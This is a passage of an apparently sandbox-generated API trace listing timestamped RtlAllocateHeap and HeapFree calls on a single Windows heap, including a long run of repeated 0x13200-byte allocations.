(HeapHandle=0x440000, Flags=0x8, Size=0x1d) returned 0x44b680 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0x443eb0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x15) returned 0x4498d0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17) returned 0x444090 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe) returned 0x4425f0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x69) returned 0x443ef0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3e) returned 0x450910 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1d) returned 0x44b2f0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x48) returned 0x450cd0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x443f70 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0x44b9f0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1b) returned 0x44b7a0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1e) returned 0x44b6b0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x29) returned 0x4584e0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1e) returned 0x44b6e0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x6b) returned 0x44ba10 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17) returned 0x44ba90 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xf) returned 0x44bab0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0x448cd0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2a) returned 0x458560 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x29) returned 0x4582e0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x448cf0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x21) returned 0x44b230 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0x459330 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x22) returned 0x44b9b0 [0294.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x459270 [0294.842] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458af0 | out: hHeap=0x440000) returned 1 [0294.843] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xa3a7) returned 0x4593f0 [0294.845] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b380 [0294.845] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xa3a7) returned 0x4637a0 [0294.847] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0294.847] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xfef7) returned 0x46db50 [0294.850] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0x450960 [0294.850] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xfef7) returned 0x47da50 [0294.852] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b380 | out: hHeap=0x440000) returned 1 [0294.852] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x46db50 | out: hHeap=0x440000) returned 1 [0294.852] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x450) returned 0x458920 [0294.852] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x450) returned 0x48d950 [0294.852] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.852] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1ea7) returned 0x48ddb0 [0294.852] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf40) returned 0x4593f0 [0294.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x7a0) returned 0x45a340 [0294.853] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48ddb0 | out: hHeap=0x440000) returned 1 [0294.853] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0294.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xbf0) returned 0x4593f0 [0294.853] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.853] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45a340 | out: hHeap=0x440000) returned 1 [0294.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x640) returned 0x458920 [0294.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1247) returned 0x48d950 [0294.853] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0294.853] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x520) returned 0x458920 [0294.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1b56) returned 0x4593f0 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8a0) returned 0x48d950 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x28ed) returned 0x45af50 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x550) returned 0x458920 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2537) returned 0x48d950 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x12b7) returned 0x4593f0 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x950) returned 0x45d850 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x3d4f) returned 0x45e1b0 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45af50 | out: hHeap=0x440000) returned 1 [0294.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45d850 | out: hHeap=0x440000) returned 1 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2377) returned 0x48d950 [0294.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x11d7) returned 0x461f10 [0294.855] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8e0) returned 0x4593f0 [0294.855] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.855] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x461f10 | out: hHeap=0x440000) returned 1 [0294.855] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0294.857] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x5b0) returned 0x458920 [0294.857] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.857] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x640) returned 0x458920 [0294.857] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x5be2) returned 0x46db50 [0294.858] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45e1b0 | out: hHeap=0x440000) returned 1 [0294.858] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.858] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x890) returned 0x48d950 [0294.858] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.858] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xac0) returned 0x48d950 [0294.858] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.858] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b380 [0294.858] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x960) returned 0x48d950 [0294.858] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x960) returned 0x48e2c0 [0294.858] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.858] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x460) returned 0x458920 [0294.858] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xe0f) returned 0x48ec30 [0294.858] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48e2c0 | out: hHeap=0x440000) returned 1 [0294.859] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.859] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1c17) returned 0x473740 [0294.859] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xe00) returned 0x48d950 [0294.859] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x700) returned 0x475360 [0294.859] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473740 | out: hHeap=0x440000) returned 1 [0294.859] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.859] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x153d) returned 0x473740 [0294.859] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48ec30 | out: hHeap=0x440000) returned 1 [0294.859] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x475360 | out: hHeap=0x440000) returned 1 [0294.859] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2277) returned 0x48d950 [0294.859] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1157) returned 0x474c90 [0294.860] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8a0) returned 0x475df0 [0294.860] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.860] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x474c90 | out: hHeap=0x440000) returned 1 [0294.860] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1fc7) returned 0x48d950 [0294.860] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473740 | out: hHeap=0x440000) returned 1 [0294.860] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x475df0 | out: hHeap=0x440000) returned 1 [0294.860] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1657) returned 0x473740 [0294.860] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xb20) returned 0x474da0 [0294.861] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x590) returned 0x48f920 [0294.861] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473740 | out: hHeap=0x440000) returned 1 [0294.861] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x474da0 | out: hHeap=0x440000) returned 1 [0294.861] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2f96) returned 0x473740 [0294.861] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.861] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48f920 | out: hHeap=0x440000) returned 1 [0294.861] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2b47) returned 0x4766e0 [0294.861] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x15b7) returned 0x48d950 [0294.862] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xad0) returned 0x48ef10 [0294.862] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4766e0 | out: hHeap=0x440000) returned 1 [0294.862] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.862] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48ef10 | out: hHeap=0x440000) returned 1 [0294.862] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2697) returned 0x4766e0 [0294.862] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1367) returned 0x48d950 [0294.862] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9a0) returned 0x48ecc0 [0294.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4766e0 | out: hHeap=0x440000) returned 1 [0294.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.863] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x474d) returned 0x4766e0 [0294.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473740 | out: hHeap=0x440000) returned 1 [0294.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48ecc0 | out: hHeap=0x440000) returned 1 [0294.863] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x920) returned 0x48d950 [0294.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.863] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1b47) returned 0x48d950 [0294.863] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xd90) returned 0x47ae40 [0294.863] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6d0) returned 0x48f4a0 [0294.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x47ae40 | out: hHeap=0x440000) returned 1 [0294.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48f4a0 | out: hHeap=0x440000) returned 1 [0294.863] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x5d0) returned 0x458920 [0294.863] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6adf) returned 0x4593f0 [0294.864] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4766e0 | out: hHeap=0x440000) returned 1 [0294.865] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.865] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1887) returned 0x48d950 [0294.865] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc30) returned 0x48f1e0 [0294.865] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x620) returned 0x458920 [0294.865] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.865] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48f1e0 | out: hHeap=0x440000) returned 1 [0294.865] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.865] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8f0) returned 0x48d950 [0294.865] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x480) returned 0x458920 [0294.866] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x240) returned 0x48e250 [0294.866] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.866] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458920 | out: hHeap=0x440000) returned 1 [0294.866] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48e250 | out: hHeap=0x440000) returned 1 [0294.866] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0x450af0 [0294.866] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b380 | out: hHeap=0x440000) returned 1 [0294.866] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x46db50 | out: hHeap=0x440000) returned 1 [0294.867] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0294.867] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x450af0 | out: hHeap=0x440000) returned 1 [0294.867] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9900) returned 0x4593f0 [0294.868] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1bf0) returned 0x48d950 [0294.869] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0294.870] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9937) returned 0x46db50 [0295.149] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0295.153] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b260 [0295.153] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9900) returned 0x4593f0 [0295.154] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1bf0) returned 0x48d950 [0295.283] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d950 | out: hHeap=0x440000) returned 1 [0295.283] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9937) returned 0x48d950 [0295.284] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593f0 | out: hHeap=0x440000) returned 1 [0295.284] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0x4505a0 [0295.284] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b260 | out: hHeap=0x440000) returned 1 [0295.284] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4637a0 | out: hHeap=0x440000) returned 1 [0295.285] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x47da50 | out: hHeap=0x440000) returned 1 [0295.285] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x450960 | out: hHeap=0x440000) returned 1 [0295.285] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4593f0 [0295.285] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x477490 [0295.285] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8) returned 0x448d10 [0295.285] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x497290 [0295.286] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x4592b0 [0295.286] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x448d10 | out: hHeap=0x440000) returned 1 [0295.286] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4aa4a0 [0295.286] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x18) returned 0x459070 [0295.286] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4592b0 | out: hHeap=0x440000) returned 1 [0295.286] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4bd6b0 [0295.287] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b260 [0295.287] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x459070 | out: hHeap=0x440000) returned 1 [0295.287] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4d08c0 [0295.287] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x30) returned 0x458860 [0295.287] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b260 | out: hHeap=0x440000) returned 1 [0295.287] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4e3ad0 [0295.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4f6ce0 [0295.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x48) returned 0x450b90 [0295.288] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458860 | out: hHeap=0x440000) returned 1 [0295.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x509ef0 [0295.289] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x51d100 [0295.289] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1ee0080 [0295.290] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x68) returned 0x448d10 [0295.290] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x450b90 | out: hHeap=0x440000) returned 1 [0295.290] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1ef3290 [0295.290] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f064a0 [0295.291] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f196b0 [0295.291] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f2c8c0 [0295.292] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x98) returned 0x444c50 [0295.292] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x448d10 | out: hHeap=0x440000) returned 1 [0295.292] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f3fad0 [0295.292] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f52ce0 [0295.292] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f65ef0 [0295.293] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f79100 [0295.293] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f8c310 [0295.294] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f9f520 [0295.294] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xe0) returned 0x444880 [0295.294] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x444c50 | out: hHeap=0x440000) returned 1 [0295.294] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1fb2730 [0295.294] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1fe0080 [0295.295] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1ff3290 [0295.296] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20064a0 [0295.296] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20196b0 [0295.298] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x202c8c0 [0295.298] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x203fad0 [0295.298] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2052ce0 [0295.299] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2065ef0 [0295.299] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x150) returned 0x44b080 [0295.299] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x444880 | out: hHeap=0x440000) returned 1 [0295.299] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2079100 [0295.299] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x208c310 [0295.300] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x209f520 [0295.300] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20b2730 [0295.301] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20c5940 [0295.301] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20d8b50 [0295.301] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20ebd60 [0295.302] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20fef70 [0295.302] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2112180 [0295.303] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2125390 [0295.303] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21385a0 [0295.303] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x214b7b0 [0295.304] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x215e9c0 [0295.304] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2171bd0 [0295.304] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1f8) returned 0x458920 [0295.305] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b080 | out: hHeap=0x440000) returned 1 [0295.305] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2184de0 [0295.305] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2197ff0 [0295.306] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21ab200 [0295.306] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21be410 [0295.306] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21e0080 [0295.308] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21f3290 [0295.308] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22064a0 [0295.309] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22196b0 [0295.683] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x222c8c0 [0295.684] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x223fad0 [0295.684] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2252ce0 [0295.685] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2265ef0 [0295.699] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2279100 [0295.699] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x228c310 [0295.700] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x229f520 [0295.701] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22b2730 [0295.701] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22c5940 [0295.702] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22d8b50 [0295.702] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22ebd60 [0295.702] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22fef70 [0295.703] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) 